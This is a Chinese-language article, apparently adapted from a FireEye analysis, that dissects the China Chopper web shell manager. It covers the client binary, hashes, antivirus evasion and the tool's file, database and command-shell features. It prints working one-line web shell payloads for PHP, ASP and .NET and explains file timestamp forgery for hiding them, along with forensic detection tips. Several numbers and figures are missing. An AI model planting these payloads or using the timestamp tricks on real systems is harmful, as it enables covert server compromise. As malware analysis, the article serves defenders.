【Web Shell】- 技术剖析中国菜刀

这里的中国菜刀不是指切菜做饭的工具，而是中国安全圈内使用非常广泛的一款Webshell管理工具，想买菜刀请出门左拐东门菜市场王铁匠处。中国菜刀用途十分广泛，支持多种语言，小巧实用，据说是一位中国军人退伍之后的作品。日前，国外安全公司Fireeye对这款工具进行了详细的剖析，可以说是一部非常nice的菜刀使用教程。

分析

中国菜刀的客户端可在www.maicaidao.com下载到。

Web shell (CnC) Client        MD5
caidao.exe                    5001ef50c7e869253a7c152a638eab8a

客户端使用UPX加壳，有220672个字节大小。使用WinHex工具查看，如图1所示：

使用脱壳工具脱壳，可以看到一些隐藏的细节：

C:\Documents and Settings\Administrator\Desktop>upx -d 5001ef50c7e869253a7c152a638eab8a.exe -o decomp.exeUltimate Packer for eXecutablesCopyright (C)  -
UPX .08w       Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th
File size         Ratio      Format      Name
--------------------   ------   -----------   -----------
 <-       31.51%    win32/pe     decomp.exe
Unpacked  file.

使用PEID（一个免费检测软件使用的加壳手法的工具），我们可以看到解压缩后的客户端程序使用Visual C + + 6.0编写，如图2所示：

因为字符串没有进行编码，所以可以通过打印输出该后门如何通信，我们可以看到一个url google.com.hk，以及参考文本Chopper：

简介

中国菜刀的工具是一款Webshell管理工具，相应必然有一个服务端的程序，它支持各种语言，如ASP、ASPX、PHP、JSP、CFM，一些官网下载原始程序MD5 HASH如下：

Web shell Payload MD5 Hash
Customize.aspx 8aa603ee2454da64f4c70f24cc0b5e08
Customize.cfm ad8288227240477a95fb023551773c84
Customize.jsp acba8115d027529763ea5c7ed6621499

例子如下：

PHP: <?php @eval($_POST['pass']);?>
ASP: <%eval request("pass")%>
.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

在实际使用过程中，替换PASS为链接的时候需要的密码。

打开中国菜刀界面，我们可以看到该工具是一款图形界面工具，并且提供了添加自己的目标、管理的功能，在客户端软件上，右键单击选择“添加”，输入IP地址，以及密码和编码方式，如图所示：

特点

中国菜刀的能够在黑客圈广泛使用，还有以下几个因素：

1、大小
2、服务端内容
3、客户端内容
4、是否免杀

大小

中国菜刀的服务端脚本非常小，是典型的一句话木马，其中aspx服务端软件只有73字节，见图14，相比其他传统的webshell可见它的优越性。

服务端内容

中国菜刀的服务端代码除了简洁之外，并且支持多种加密、编码，下图是aspx的服务端代码：

客户端内容

在浏览器不会产生任何客户端代码，如图：

免杀

通过病毒扫描网站运行Web shell No Virus Thanks显示检测率为14，这表示大多数（不是全部）防病毒工具都会对它的Web Shell免杀。

ViusTotal也是如此。它的47个反病毒引擎中没有一个将它标记为恶意攻击：

功能

上面简单介绍了中国菜刀的客户端和服务端的，下面来介绍下该款工具的其他功能，中国菜刀包含了“安全扫描”功能，攻击者能够使用爬虫或暴力破解来攻击目标站点，如下图：

在除了发现漏洞之外，中国菜刀最强大的莫过于管理功能了，包含以下内容：

、文件管理（文件资源管理器）
、数据库管理（DB客户端）
、虚拟终端（命令行）

在中国菜刀的客户端界面中，右键单击一个目标可以查看相应的功能列表，如图：

文件管理

中国菜刀作为一个远程访问工具（RAT），包含了常见的上传、下载、编辑、删除、复制、重命名以及改变文件的时间戳。如图：

修改文件功能现在常见的webshell就带了该功能，下图显示了测试目录的三个文件，因为Windows资源管理器只显示“修改日期”字段，所以通常情况下，能够达到隐藏操作的目的：

使用工具将文件修改和其他两个文件相同，如图，可以看到文件的修改的日期和其他两个文件一致，如果不是专业的人士，一般不会看出这几个文件的区别：

当文件的创建日期和修改日期被修改之后，查出异常文件非常麻烦，需要分析主文件表MFT以及FTK，fireeye建议使用工具mftdump来进行分析，该工具能够提取文件元数据进行分析。

下表显示了从MFT中提取的Webshell时间戳，注意"fn*"字段包含了文件的原始时间。

Category               Pre-touch match    Post-touch match
siCreateTime (UTC)    // :    // :
siAccessTime (UTC)    // :    // :
siModTime (UTC)    // :    // :
siMFTModTime (UTC)    // :    // :
fnCreateTime (UTC)    // :    // :
fnAccessTime (UTC)    // :    // :
fnModTime (UTC)    // :    // :
fnMFTModTime (UTC)    // :    // :

数据库管理

中国菜刀支持各种数据库，如MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS等，数据库操作界面，内置了一些常用的数据库语句，能够自动显示表名、列名，查询语句，并且内置了常用的数据库语句。如下图：

链接之后，菜刀提供了一些常见的数据库语句，如图：

命令行功能

最后，菜刀提供了一个命令行界面，能够通过命令行shell进行操作系统级别的互动，当然继承的权限是WEB应用的权限。如图：

参考：https://www.freebuf.com/articles/web/11687.html